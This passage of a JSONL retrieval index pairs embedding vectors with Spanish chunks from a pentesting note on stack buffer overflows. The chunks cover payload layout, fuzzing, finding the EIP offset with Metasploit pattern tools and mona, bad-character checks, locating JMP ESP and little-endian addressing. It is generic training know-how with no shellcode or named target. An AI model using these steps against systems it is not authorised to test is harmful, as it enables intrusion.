0.00163, 0.00086, -0.00472, -0.00875, -0.08578, 0.04508, -0.05458, -0.0458, 0.01637, -0.01612, -0.03443, 0.02185, 0.0453, -0.01895, 0.07043, -0.05515, 0.05614, 0.05497, -0.02287, 0.03144, -0.07386, -0.00712, -0.0602, -0.0073, 0.04096, 0.02952, -0.0373, 0.0027, 0.06923, 0.05764, 0.05949, -0.01626, 0.01698, -0.01345, -0.02456, 0.01391, -0.01623, 0.01736, -0.00048, 0.01491, -0.05661, 0.07777, 0.00643, 0.02168, -0.0123, -0.0937, -0.07196, -0.00424, 0.02276, -0.01415, 0.00209, -0.04502, -0.06863, -0.01428, -0.03479, -0.01815, -0.01698, -0.01852, -0.07247, -0.02799, -0.06468, 0.03231, 0.03801]} +{"tipo": "metodologia", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "texto": "## Los 7 pasos\n```\n[ prefix ] + [ \"A\"*offset ] + [ JMP ESP ] + [ NOPs ] + [ shellcode ]\n```", "v": [-0.01854, -0.0042, -0.13766, -0.04825, -0.06893, -0.08719, 0.03155, -0.09569, -0.11812, 0.1091, -0.06512, 0.10433, -0.05575, -0.10453, 0.10018, -0.10608, -0.09613, -0.00271, -0.05715, 0.17672, -0.0163, 0.02448, -0.06646, -0.16396, 0.0249, 0.17462, -0.06919, 0.15097, -0.05782, -0.0965, -0.07625, -0.03006, -0.13002, 0.0061, -0.05467, 0.02766, 0.05546, -0.00589, -0.11213, 0.17955, -0.03858, 0.06053, -0.05006, 0.15778, -0.06025, 0.03902, -0.0283, 0.1069, -0.01584, -0.1187, 0.07187, 0.003, -0.13373, -0.03019, 0.04158, -0.04346, 0.12564, 0.02404, -0.08491, 0.04584, 0.05959, 0.08249, -0.02459, -0.09118, 0.10812, -0.02509, 0.09499, -0.15834, -0.09118, 0.03416, -0.10837, -0.02099, -0.00262, -0.06295, 0.06355, -0.01155, 0.06066, -0.11733, 0.10904, 0.01674, -0.05775, -0.09434, -0.05874, -0.02214, 0.02492, 0.00223, -0.03965, 0.061, -0.03763, -0.02273, 0.09949, -0.00912, 0.054, 0.08061, 0.02306, -0.04766, 0.01165, 0.0528, 0.10618, 0.07969, 0.07618, 0.02904, -0.03782, 0.00361, 0.09415, 0.04807, 0.03409, 0.02038, 0.08158, 0.03789, -0.04615, 0.01924, 0.07772, -0.00497, 0.02214, 0.05806, -0.02719, 0.00621, 0.01861, -0.04156, 0.08191, 0.0336, -0.06699, 0.04422, 0.03522, -0.08704, -0.03357, 0.04093, 0.03808, -0.01228, -0.04815, -0.02451, -0.00529, 0.05085, 0.03542, 0.12536, 0.04659, 0.07673, 0.04673, 0.02689, 0.00413, 0.03482, 0.03958, 0.0131, 0.09807, 0.08098, 0.03968, -0.11273, -0.08585, 0.075, -0.0208, 0.03239, -0.08068, 0.00842, 0.07878, -0.10966, 0.00585, -0.03221, 0.0119, 0.03583, -0.0315, 0.07442, 0.04638, 0.09507, 0.00685, -0.04762, 0.02428, 0.01134, 0.0551, -0.04692, -0.00356, 0.04139, -0.01739, 0.00513, -0.04091, 0.03281, 0.00364, -0.0436, -0.02467, -0.01361, -0.05014, -0.0158, -0.01594, 0.01848, -0.03225, 0.02699, 0.0191, -0.0656, -0.02567, -0.00603, 0.07386, -0.0099, 0.00486, 0.03887, -0.04532, -0.02775, -0.01831, -0.08261, 0.01942, -0.03291, -0.02259, 0.0442, 0.05732, -0.01311, 0.00899, -0.04257, -0.02403, -0.00392, -0.05756, -0.00449, 0.00124, -0.10025, 0.04576, -0.01414, -0.06265, -0.05458, -0.03943, 0.03998, 0.01802, -0.02723, -0.02438, 0.08326, 0.08286, 0.02978, 0.02606, 0.04541, 0.01403, -0.00779, 0.02805, -0.04069, -0.06868, 0.05432, 0.00296, -0.06369, 0.03094, -0.00222, -0.00965, 0.03066, -0.10779, -0.0599, -0.01613, -0.00349, -0.03466, -0.05744, -0.02529, -0.02689, -0.06825, 0.02379, 0.05499, -0.00276, -0.01463, -0.00406, -0.03319, -0.02878, 0.05434, 0.01575]} +{"tipo": "metodologia", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "texto": "### 1. Fuzzing — encontrar el crash\nScript Python que envía buffers crecientes (+100 bytes) hasta que la app casca.", "v": [0.08575, -0.06186, -0.02178, -0.11813, 0.01415, -0.18367, -0.15478, -0.03295, 0.03508, -0.0241, -0.0702, -0.00516, -0.18302, 0.07719, -0.04739, -0.12293, -0.1648, 0.00807, 0.08049, -0.03045, 0.03979, -0.07147, -0.14041, -0.15276, -0.0086, 0.13872, -0.09395, 0.06359, -0.13606, -0.06247, 0.12572, 0.00627, 0.1625, 0.09532, -0.10604, -0.03807, -0.00104, 0.02311, 0.01569, 0.06067, 0.00089, 0.13218, -0.08372, 0.02591, -0.01163, -0.12465, 0.07437, 0.05996, 0.01409, -0.09982, 0.02568, -0.08832, -0.11059, 0.02883, -0.08239, -0.00117, 0.01989, -0.16154, 0.01062, 6e-05, -0.06172, 0.04332, -0.00552, -0.08476, -0.00916, 0.00073, 0.04217, 0.00166, -0.13682, 0.06721, -0.00644, 0.0404, -0.0205, 0.00668, 0.0458, 0.08007, -0.12161, -0.08314, -0.01386, 0.06538, -0.10312, -0.08894, -0.03166, -0.01305, 0.00733, -0.04324, 0.02546, -0.02129, 0.03452, 0.06583, 0.0684, 0.11978, 0.02207, 0.0173, 0.02373, -0.02962, 0.07902, -0.08885, 0.02918, 0.05476, -0.04154, -0.04912, -0.02699, 0.06444, -0.04329, 0.0946, 0.09604, 0.05474, 0.03107, 0.01906, 0.06785, -0.03115, 0.0951, -0.00297, -0.09381, -0.06661, 0.00913, 0.02734, 0.04688, -0.0407, -0.01056, 0.06795, -0.01933, 0.08762, -0.04173, -0.00274, -0.04209, 0.09167, -0.02506, -0.05235, 0.03457, -0.02231, -0.06084, -0.04976, -0.04675, 0.15528, 0.02625, -0.05132, 0.03876, 0.00091, -0.02249, 0.05174, 0.02622, 0.02077, 0.04914, 0.03008, -0.01727, -0.06084, -0.06608, -0.01704, 0.08197, 0.04209, -0.08992, -0.00058, -0.01435, -0.05398, -0.01713, -0.05001, -0.06282, -0.0966, 0.06512, -0.02776, -0.0155, 0.04541, -0.01155, -0.07923, 0.02653, 0.056, 0.00289, 0.00327, -0.0263, -0.06043, 0.03291, -0.12132, -0.01488, -0.02301, 0.00745, -0.09723, -0.0848, -0.05284, -0.01084, -0.14158, 0.02697, 0.03588, 0.03014, -0.05972, 0.01284, 0.06479, -0.03269, 0.02742, 0.01229, 0.06307, -0.0372, -0.0057, -0.00729, -0.01775, -0.00903, -0.03479, 0.0477, -0.00151, 0.01726, 0.02212, -0.06848, 0.01441, -0.02077, -0.00685, -0.01647, -0.06921, -0.02048, -0.06509, -0.03487, -0.01158, -0.01255, 0.09671, -0.00827, -0.06855, 0.00878, 0.111, 0.04963, -0.04912, -0.02076, -0.03835, 0.03689, -0.01077, -0.09163, -0.01817, 0.07243, -0.00146, -0.01859, 0.00975, -0.00283, -0.0286, -0.03624, 0.01, 0.03029, -0.02815, -0.00161, 0.05614, -0.09728, 0.00503, -0.01898, 0.02079, -0.02096, -0.00133, -0.00785, -0.03143, -0.05583, 0.04627, -0.06396, -0.00783, -0.01966, -0.03124, 0.05191, -0.03051, 0.03302, -0.02709]} +{"tipo": "metodologia", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "texto": "### 2. Offset — posición exacta del EIP\n```bash\nmsf-pattern_create -l 3000 # mándalo como buffer\nmsf-pattern_offset -l 3000 -q 39694438 # el valor que quedó en EIP", "v": [0.07461, -0.0079, -0.02787, -0.02236, -0.02633, -0.12572, -0.09047, 0.00096, -0.17544, 0.0842, -0.01283, 0.02211, 0.03611, 0.02684, -0.02657, -0.04722, 0.00513, -0.01579, -0.14931, 0.06729, 0.0802, 0.04985, -0.01068, -0.11165, 0.02941, 0.19295, -0.19436, 0.09667, -0.20758, 0.05004, 0.15102, 0.07158, -0.12725, -0.02865, 0.08689, -0.00101, 0.07273, 0.01887, -0.07003, 0.05311, 0.05949, -0.02131, -0.08324, 0.05704, 0.07608, -0.13725, -0.02608, 0.05668, 0.0271, 0.02125, -0.01972, -0.08295, 0.05293, 0.15462, -0.02036, -0.01696, 0.13394, 0.05746, -0.02339, 0.05479, 0.01573, -0.06428, -0.08277, -0.10645, 0.00935, -0.06114, 0.05034, 0.02887, -0.03067, -0.02404, -0.01198, 0.02872, -0.09449, -0.08809, 0.09878, 0.01602, 0.02474, 0.02898, 0.07885, 0.01864, -0.12259, -0.0241, -0.10949, -0.02534, 0.00817, 0.06072, 0.01719, -0.04817, -0.08659, -0.10504, 0.09874, 0.11259, 0.03234, 2e-05, -0.02252, -0.17019, -0.02135, 0.13417, 0.00558, 0.0219, 0.01491, 0.08981, -0.12399, 0.04823, 0.10259, 0.0358, 0.03938, -0.00742, -0.0121, 0.0094, 0.04782, -0.0549, 0.05478, -0.00987, -0.00858, -0.09121, 0.05796, 0.08211, 0.0545, 0.04257, 0.00556, 0.01644, 0.04328, 0.05576, -0.04399, 0.00644, -0.02247, 0.06361, -0.00186, 0.0267, 0.03461, 0.03265, -0.06396, 0.04044, -0.06086, -0.06316, 0.02896, 0.02899, 0.00624, 0.0378, 0.10384, 0.06922, -0.03027, -0.04443, 0.03009, -0.05901, 0.0673, -0.15401, -0.09457, 0.05537, 0.04089, -0.01695, -0.02083, 0.01886, 0.01442, -0.00451, 0.00768, 0.01069, -0.0366, 0.01391, 0.01254, 0.07095, 0.0204, 0.02719, 0.00749, -0.05638, 0.00252, -0.01154, 0.00849, 0.00284, -0.06456, -0.06823, -0.04057, -0.06507, 0.02234, -0.06441, -0.0513, -0.00843, 0.0311, 0.00737, -0.06149, -0.03658, -0.00619, 0.02185, 0.01959, -0.0022, 0.08346, 0.10259, 0.03048, 0.07027, 0.03627, 0.03298, 0.00566, -0.05978, 0.08491, -0.09113, 0.02525, -0.0639, 0.02645, -0.10141, -0.03133, 0.06367, 0.0232, -0.08196, -0.04078, -0.05788, -0.05389, 0.01633, -0.01101, -0.02439, -0.07207, -0.03676, 0.03718, 0.02359, -0.02162, -0.00111, -4e-05, 1e-05, -0.00266, 0.00696, 0.03886, 0.08454, -0.00493, 0.00596, 0.02095, -0.05159, 0.0663, -0.02637, 0.01905, 0.01597, -0.04625, 0.04046, 0.03106, -0.0789, 0.04713, 0.05527, 0.01846, -0.07393, -0.04212, -0.10706, 0.00704, 0.07067, -0.00377, -0.06078, 0.01924, -0.04847, -0.07485, 0.01386, 0.0242, -0.0111, -0.03945, 0.02126, -0.00312, -0.07436, 0.01785, -0.07413]} +{"tipo": "metodologia", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "texto": "# alternativa en mona:\n!mona findmsp -distance 3000 # te da \"EIP contains normal pattern ... offset XXXX\"\n```", "v": [0.07333, 0.12766, -0.12193, -0.01788, -0.11653, -0.0992, -0.08467, -0.01289, -0.17114, 0.06764, 0.0397, -0.09649, 0.06283, 0.01297, -0.02348, -0.0728, 0.07091, -0.01351, 0.03316, 0.0249, -0.07233, 0.02906, -0.06462, -0.15799, 0.13197, 0.10617, -0.19001, 0.14153, -0.03599, -0.04681, 0.07393, -0.00795, -0.04788, 0.10601, -0.17348, -0.01497, 0.07157, -0.04859, 0.03782, -0.03949, -0.03135, -0.04259, -0.0176, 0.08612, -0.0099, -0.1211, 0.03533, 0.07011, -0.05071, 0.01537, -0.15968, 0.05093, 0.03039, 0.07687, 0.00176, 0.02201, 0.12107, 0.08258, -0.00249, 0.14827, 0.06442, -0.05222, -0.06608, -0.07216, 0.05729, 0.00573, 0.06541, -0.00196, -0.17639, -0.0048, -0.03771, -0.08468, -0.08779, -0.08474, -0.0228, -0.09924, 0.0106, -0.04399, 0.07867, 0.0589, -0.04308, -0.04369, -0.01593, -0.04186, -0.01638, 0.01371, 0.00547, 0.00859, -0.0506, -0.08636, 0.07301, 0.08043, 0.08332, -0.00073, -0.05303, -0.22165, -0.05991, 0.10763, -0.08439, -0.01071, -0.03665, 0.08594, -0.12121, -0.04762, 0.099, 0.0406, -0.02213, 0.07921, -0.03009, -0.03383, 0.02359, -0.02094, 0.03424, 0.03993, -0.01279, -0.07411, 0.00411, 0.14696, -0.0365, -0.01198, 0.02333, 0.02856, -0.02236, 0.05567, -0.00029, -0.00099, 0.01642, 0.00407, 0.00319, 0.0125, 0.05562, -0.01309, -0.06773, -0.06286, -0.08798, -0.02017, 0.01918, 0.04417, 0.05324, 0.07132, 0.04548, 0.01822, -0.06501, -0.01761, -0.0176, -0.08435, 0.02526, -0.09992, -0.02514, 0.00788, -0.02739, 0.00053, -0.03294, 0.03156, 0.02549, 0.01499, -0.043, -0.04823, -0.02745, -0.02149, 0.11327, -0.00152, 0.0846, -0.043, 0.01819, 0.00317, 0.04987, -0.01967, -0.10351, 0.00064, -0.04067, 0.03894, -0.02615, -0.0502, 0.00865, -0.02136, 0.00691, -0.03529, -0.01115, 0.00607, -0.02014, -0.04314, 0.01635, 0.06205, 0.11561, 0.0085, 0.09886, 0.08791, 0.0065, -0.00016, -0.00136, -0.02365, 0.01463, -0.03578, 0.07812, 0.0059, 0.0853, -0.03259, -0.02133, -0.0889, 0.00203, -0.00332, 0.06691, -0.11086, -0.03375, -0.0447, -0.01912, 0.00195, -0.02251, -0.04072, -0.03858, 0.05288, -0.0108, 0.07773, 0.01708, -0.0392, 0.03176, 0.03465, 0.01539, -0.05829, -0.00606, 0.04565, -0.04599, 0.04406, 0.05019, -0.02974, 0.03074, -0.02997, 0.01462, -0.07163, 0.02337, 0.05184, 0.08578, -0.03191, -0.04371, -0.03234, 0.00994, -0.04428, 0.03444, -0.03411, -0.01613, -0.00277, 0.12938, 0.07567, 0.02751, 0.0437, -0.02609, -0.01506, -0.00701, 0.06337, -0.02079, -0.01885, -0.02964, 0.00319, 0.02088, 0.00469]} +{"tipo": "metodologia", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "texto": "### 3. Controlar EIP — confirmar\nEnvía `\"A\"*offset + \"BBBB\"` → en el debugger **EIP = 42424242**. Control confirmado.", "v": [0.01044, 0.01061, -0.08112, 0.03565, 0.10076, -0.16054, 0.01297, 0.0185, -0.08174, -0.06174, -0.03966, -0.07618, -0.08696, -0.00858, -0.04573, -0.00904, -0.11353, -0.08218, -0.05041, 0.03567, 0.16942, 0.17314, 0.02531, -0.01712, 0.13631, 0.16137, -0.26185, 0.17485, -0.10992, 0.03214, 0.02928, -0.04849, 0.07959, 0.071, -0.03362, 0.07283, -0.01338, 0.04216, -0.00613, 0.12848, -0.01279, -0.04746, -0.02414, 0.05765, -0.00262, -0.00131, 0.15953, 0.02454, -0.06284, -0.06209, -0.06833, 0.06207, -0.06087, 0.0505, -0.1599, -0.03985, 0.03066, -0.01413, 0.09405, 0.00621, 0.09769, -0.06192, 0.00293, -0.00598, -0.00296, -0.00659, 0.07106, 0.00482, -0.09062, 0.03175, -0.06721, 0.04335, -0.00066, -0.05339, 0.06431, -0.07765, 0.03842, 0.0021, 0.07305, -0.01727, -0.07121, -0.02519, -0.08377, -0.02717, -0.0136, -0.00023, -0.11677, -0.1796, -0.19454, -0.0754, 0.04034, 0.08287, 0.02223, 0.0365, -0.01249, -0.12988, -0.01755, 0.07089, 0.09504, -0.03886, 0.03411, 0.02172, -0.02356, 0.06867, 0.0873, 0.02219, 0.12753, -0.01154, 0.04037, 0.01995, -0.10252, 0.0621, 0.00521, 0.02672, -0.04446, 0.00856, 0.03634, 0.08714, 0.02766, 0.04776, -0.01275, 0.01746, 0.04026, -0.0807, 0.01488, 0.00329, -0.00127, -0.00106, 0.11775, 0.00428, -0.02643, -0.05872, -0.03395, 0.01122, -0.05333, 0.01035, -0.05601, 0.08094, 0.03208, 0.04886, -0.00514, -0.02532, 0.04084, -0.00405, 0.12232, -0.00032, -0.01649, -0.01815, -0.03118, 0.15993, 0.09976, 0.00645, -0.01809, 0.03518, 0.05522, -0.00862, -0.0557, 0.05684, -0.03624, 0.01841, -0.02701, 0.09483, 0.03309, 0.01499, 0.06033, 0.0164, 0.05956, -0.07771, 0.02197, -0.0192, -0.02045, 0.06449, 0.01166, -0.00895, -0.03843, -0.0532, 0.00739, -0.04096, -0.01715, -0.0015, -0.02084, -0.02545, -0.01225, -0.07125, 0.06337, 0.08253, 0.00114, 0.03551, 0.06007, 0.02152, 0.04092, -0.05717, 0.00529, -0.07157, 0.07204, -0.019, 0.01712, -0.00972, 0.01492, -0.08121, -0.02762, -0.0094, -0.01125, -0.06089, 0.01002, -0.01802, -0.03081, 0.00463, 0.02408, -0.00168, 0.02359, 0.00619, 0.06987, 0.02472, 0.02604, -0.04039, 0.0311, 0.0707, 0.03402, -0.06085, -0.00322, 0.00688, 0.07689, -0.01276, -0.00904, -0.00162, 0.05699, 0.01847, 0.02019, -0.01239, -0.0341, 0.08752, -0.00619, -0.05039, 0.02825, 0.024, 0.04496, 0.00904, -0.02875, -0.08267, 0.02964, 0.05176, -0.02709, -0.08157, -0.04261, -0.04735, -0.11306, 0.01734, 0.03928, 0.02493, -0.08129, -0.0169, -0.01366, -0.0473, -0.03875, -0.00471]} +{"tipo": "metodologia", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "texto": "### 4. Badchars — bytes que corrompen\n```\n!mona bytearray -b \"\\x00\" # genera \\x01..\\xff", "v": [0.0678, -0.12863, 0.06913, 0.1411, -0.0895, -0.14496, -0.01823, 0.02438, -0.00615, -0.03998, -0.03795, -0.08823, -0.05274, -0.02726, 0.02903, -0.0946, -0.19241, -0.02481, -0.01818, -0.05305, 0.1597, -0.02058, -0.02657, -0.04383, 0.04801, 0.07411, -0.0768, 0.00916, -0.11167, 0.04365, 0.08366, -0.12858, 0.14066, 0.09398, -0.14908, -0.02017, -0.06773, -0.02774, -0.06542, 0.12817, -0.04228, 0.04936, -0.08871, 0.14934, 0.14172, -0.09947, 0.03536, 0.1508, -0.01028, -0.06878, -0.03625, 0.02402, -0.06829, 0.04344, -0.05905, -0.08083, 0.12968, -0.03176, -0.11041, 0.02868, 0.06329, 0.03818, -0.0209, -0.06869, 0.00312, 0.00507, 0.11607, -0.03168, -0.08397, 0.09386, -0.06844, -0.00163, -0.0224, -0.07817, 0.0348, -0.0082, 0.04073, -0.12043, 0.00091, 0.0754, -0.0728, -0.01256, -0.03101, -0.01503, 0.00608, -0.04081, 0.02388, -0.06111, -0.06592, -0.01443, 0.10622, 0.11354, 0.09116, -0.00891, -0.06092, -0.11267, 0.11577, 0.01648, 0.03225, 0.06668, -0.01967, 0.05222, -0.08387, 0.02519, 0.09876, 0.08315, -0.05024, 0.01803, -0.06333, 0.03197, 0.11778, 0.04356, 0.05206, -0.00827, -0.06606, -0.11375, -0.08237, 0.00619, -0.04306, 0.01051, -0.00579, -0.05587, -0.02327, 0.15161, -0.05333, -0.01169, -0.08116, -0.06975, 0.00904, -0.07198, 0.06393, 0.00663, -0.00854, -0.03419, -0.08692, 0.05926, -0.00062, 0.03532, -0.00805, -0.02913, 0.08019, 0.08856, -0.03539, 0.00715, 0.03546, 0.07032, 0.05887, -0.04038, -0.04783, 0.0054, 0.05571, -0.01827, -0.02694, 0.02503, -0.06166, 0.00416, -0.0101, -0.04043, -0.096, -0.09574, -0.01799, -0.03996, 0.08701, 0.02077, -0.09416, -0.00431, 0.02979, 0.06276, -0.00968, -0.03159, -0.01532, -0.06175, -0.0065, -0.08261, -0.04205, -0.01058, -0.05127, -0.03165, -0.04299, 0.00787, -0.01644, -0.09422, -0.0301, 0.00439, -0.05379, 0.02082, -0.04676, 0.00731, -0.0122, 0.0358, 0.0137, 0.01936, 0.04822, 0.06131, 0.02462, -0.01847, -0.00214, 0.03343, -0.01371, -0.03613, 0.05576, 0.0383, 0.04944, 0.07935, 0.00298, 0.01492, -0.01771, 0.01956, -0.04175, 0.03532, -0.03722, -0.00965, -0.0307, 0.04804, -0.11557, -0.02253, 0.03548, 0.04653, -0.0272, -0.0526, -0.00403, -0.02945, 0.03609, -0.07775, -0.06133, 0.02041, 0.03993, -0.03605, 0.08649, -0.05544, 0.0374, 0.01855, -0.05145, -0.01461, 0.04574, -0.05103, -0.07971, -0.03784, -0.05259, -0.04258, 0.04709, 0.00377, -0.02245, -0.07992, -0.01984, -0.0337, -0.07098, 0.11856, 0.02351, 0.01512, -0.00982, -0.01897, -0.036, -0.0034, 0.04956, 0.01423]} +{"tipo": "metodologia", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "texto": "# envías offset + \"BBBB\" + bytearray, y comparas en memoria (ESP):\n!mona compare -f C:\\mona\\app\\bytearray.bin -a \n```\nQuita los corruptos (típico: `\\x00`, a veces `\\x0a \\x0d`) y repite hasta \"unmodified\".", "v": [0.10004, 0.00037, -0.01012, 0.21539, 0.03107, -0.19382, -0.02901, -0.0416, -0.11544, -0.15306, -0.04689, -0.06295, -0.00662, 0.09046, 0.04185, -0.07157, -0.0728, 0.02175, -0.01948, -0.07088, 0.18292, -0.05497, 0.07172, -0.02941, 0.05944, 0.05005, -0.0783, 0.1308, -0.05076, 0.01189, 0.10718, -0.01337, 0.08162, 0.02238, -0.00712, 0.0276, 0.03348, -0.05875, -0.0425, 0.01503, 0.06293, 0.02215, -0.07547, 0.08222, 0.03848, -0.04798, -0.02094, 0.1935, -0.04538, -0.00781, -0.08448, -0.06969, -0.08157, -0.01514, -0.00617, -0.07523, 0.1762, 0.01107, -0.00435, 0.07215, 0.09954, 0.03219, -0.01205, -0.12013, 0.09082, -0.03583, 0.06422, -0.00961, -0.14109, 0.01897, -0.18194, -0.00876, -0.07927, -0.0279, 0.09113, -0.06082, 0.09001, -0.09503, 0.0528, 0.10246, -0.08372, -0.13428, -0.12174, 0.00162, -0.02046, -0.01571, 0.07475, -0.00787, 0.00395, -0.08397, 0.11084, 0.09234, 0.07385, 0.03962, -0.02391, -0.09966, 0.16067, 0.02493, 0.09705, 0.10894, 0.05173, 0.02446, -0.14768, 0.07274, 0.07115, 0.03257, -0.04027, 0.01726, 0.02087, -0.00779, 0.09956, -0.02456, 0.0014, 0.00882, -0.00321, -0.03995, -0.03461, 0.03861, -0.045, -0.02658, 0.00262, -0.05647, -0.01496, 0.00884, 0.00078, -0.07618, -0.05783, 0.01297, 0.03367, 0.08612, 0.0253, 0.09339, -0.00923, -0.04693, -0.05889, 0.06349, 0.02405, 0.03626, 0.06327, 0.02793, 0.01038, 0.10473, 0.03799, -0.00804, 0.04965, 0.08717, 0.1035, -0.10121, -0.03926, 0.02977, 0.05591, 0.03768, -0.01806, 0.00398, -0.06321, 0.01847, 0.04761, -0.06814, -0.07182, -0.03704, 0.00417, -0.00232, 0.06468, 0.04299, -0.01982, -0.03157, 0.02452, 0.02857, 0.01597, -0.06929, -0.00339, 0.04114, -0.05276, -0.06754, -0.03513, -0.00661, -0.0393, -0.04752, 0.00145, -0.01634, -0.00989, -0.03541, 0.01416, 0.02588, 0.02716, 0.01964, -0.04138, 0.0213, 0.04979, 0.0012, 0.00784, 0.05914, -0.00018, 0.01074, 0.02881, -0.02367, -0.02175, -0.00063, 0.02876, -0.0051, -0.02531, 0.01443, 0.01305, 0.00034, 0.03193, 0.0054, -0.00044, 0.084, -0.04151, 0.06677, -0.03719, -0.02357, -0.00561, 0.03888, -0.07072, -0.04906, 0.02981, -0.03183, -0.04546, -0.04598, -0.0101, 0.02264, 0.04384, -0.00131, -0.00057, -0.01468, 0.06031, 0.02316, 0.06543, 0.01562, -0.05756, 0.03835, -0.06018, -0.04945, 0.08547, 0.03092, -0.04419, -0.09046, -0.0694, -0.06694, 0.03577, 0.01175, 0.00793, -0.07618, -0.00838, -0.07774, -0.05329, 0.08852, 0.01287, -0.05493, 0.00725, -0.0013, 0.01369, -0.06008, 0.02446, -0.01389]} +{"tipo": "metodologia", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "texto": "### 5. JMP ESP — la dirección de retorno\n```\n!mona jmp -r esp -cpb \"\\x00\\x0a\\x0d\" # busca un JMP ESP sin badchars", "v": [0.0222, -0.12398, -0.04322, 0.03067, -0.15908, -0.18869, -0.04339, -0.08984, -0.01379, -0.01251, 0.02304, 0.05609, 0.04423, -0.11961, -0.06053, -0.05455, -0.03232, 0.14163, -0.06659, 0.01965, 0.01195, 0.05411, -0.0362, -0.15106, 0.04334, 0.21175, -0.17328, 0.09044, -0.08179, -0.00938, 0.1004, 0.00703, -0.0264, 0.02336, 0.05765, 0.13395, 0.10318, 0.0137, -0.06206, 0.15202, 0.04239, -0.02116, -0.05009, 0.00554, -0.03306, 0.01626, 0.10854, 0.13716, -0.06006, -0.02363, -0.11664, 0.06892, -0.21949, -0.04621, -0.05178, 0.07925, 0.11745, -0.01109, -0.04514, 0.02769, 0.10347, 0.0681, -0.0825, -0.06757, 0.05948, -0.05472, 0.13855, -0.10856, -0.0656, 0.01981, -0.14169, -0.01166, -0.04315, -0.09034, 0.09731, -0.03065, 0.12636, -0.03554, 0.11634, 0.04104, 0.00975, -0.07704, -0.11064, -0.00615, -0.07981, -0.11758, -0.02418, 0.075, -0.08111, -0.08628, 0.01916, 0.029, 0.07173, 0.02946, -0.07286, -0.17192, 0.02965, 0.0465, 0.04422, 0.03924, 0.04372, 0.13419, -0.08674, -0.02548, 0.06337, 0.00761, 0.03979, -0.03648, 0.02459, 0.01026, 0.05149, 0.03216, -0.03651, -0.0284, 0.0357, -0.09574, -0.13583, 0.01172, 0.00123, -0.09018, 0.00427, -0.00313, 0.00939, 0.00493, 0.0018, -0.04179, -0.01257, -9e-05, 0.135, 0.02861, 0.01927, -0.01092, -0.05871, -0.00457, -0.05232, 0.02643, 0.01067, 0.11707, 0.00261, 0.01003, 0.0173, 0.02671, 0.07427, -0.04003, -0.00479, 0.01536, 0.08511, -0.11731, 0.00907, 0.03065, 0.0274, -0.00648, -0.02359, 0.01398, 0.04881, 0.06075, 0.01893, -0.02842, -0.03832, -0.01883, -0.00549, 0.0172, 0.01302, 0.04805, 0.01726, 0.04888, 0.05655, 0.00039, 0.0697, -0.02414, 0.0116, -0.01784, -0.03899, -0.02732, 0.01569, 0.02138, 0.00882, -0.01762, -0.00789, 0.01163, 0.0091, -0.05231, -0.03321, -0.01103, 0.03814, -0.02941, -0.01476, -0.05834, 0.0384, -0.05514, -0.00913, -0.01097, -0.00205, 0.00501, -0.01599, 0.00675, -0.002, 0.01139, -0.04866, 0.04421, -0.02676, -0.00145, 0.05501, -0.03029, 0.02815, -0.03873, 0.00249, 0.05291, -0.02713, 0.00817, -0.02764, -0.04777, 0.013, 0.02252, -0.08519, -0.04659, 0.00094, -0.03013, -0.01823, -0.01774, -0.02893, 0.03751, -0.00773, -0.03907, 0.05164, -0.00478, -0.04479, -0.02047, 0.04221, -0.00743, -0.07459, 0.04604, -0.05975, -0.05719, 0.03919, 0.02818, 0.01354, -0.0422, 0.01513, -0.03034, 0.00647, 0.02743, 0.02508, -0.09184, 0.01147, -0.0001, -0.07111, 0.07129, 0.06955, -0.02316, 0.02354, 0.0248, 0.0134, 0.00198, 0.02886, 0.01025]} +{"tipo": "metodologia", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "texto": "# alternativa: objdump -d vuln.exe | grep -i 'jmp.*esp'\n```\nApunta la dirección **en little-endian** (ej. `0x625011AF` → `\\xAF\\x11\\x50\\x62`).", "v": [-0.05936, -0.16245, -0.05102, 0.01968, -0.00856, -0.03725, -0.02492, -0.10273, -0.06095, 0.04613, 0.0356, -0.20692, -0.09564, -0.04892, 0.0099, -0.08944, -0.0939, -0.02373, -0.06676, 0.11065, -0.01651, 0.1176, -0.14464, -0.09912, 0.00723, 0.19788, -0.13543, 0.11444, -0.12706, -0.11805, 0.16829, 0.0082, -0.07008, -0.0386, 0.03649, 0.10942, 0.06576, 0.04476, 0.00758, 0.13743, 0.07351, -0.02441, -0.14071, 0.06798, 0.02656, -0.00387, 0.00943, 0.12285, -0.04441, -0.01314, -0.05734, -0.01165, -0.08092, 0.01249, 0.01974, 0.02179, 0.13058, -0.08543, 0.00481, 0.07215, 0.15571, 0.09378, -0.03452, -0.11268, 0.08703, 0.0302, 0.08612, -0.09428, -0.06817, 0.03344, -0.09459, 0.03614, -0.01613, -0.0962, 0.02051, -0.09536, 0.09067, -0.05308, 0.13882, 0.0852, 0.03468, -0.07542, -0.10043, -0.05223, -0.11861, -0.11345, 0.03155, -0.00025, -0.06918, -0.08598, 0.06806, -0.00371, 0.06921, 0.06533, 0.00859, -0.12791, -0.00549, 0.0894, 0.04129, 0.03309, 0.04022, 0.01875, -0.10476, 0.02725, 0.06834, -0.06446, -0.00491, 0.06028, -0.00321, 0.02545, 0.09665, 0.09015, 0.06607, -0.00799, -0.04201, -0.09769, -0.07674, 0.01697, 0.01168, 0.01427, -0.02574, -0.033, 0.02004, 0.01285, -0.08841, -0.06492, -0.04878, 0.05567, 0.0491, 0.01441, -0.00461, 0.02539, 0.02366, 0.00116, -0.05953, 0.01067, 0.05265, 0.02654, 0.06086, -0.01601, 0.08829, 0.05014, 0.03528, 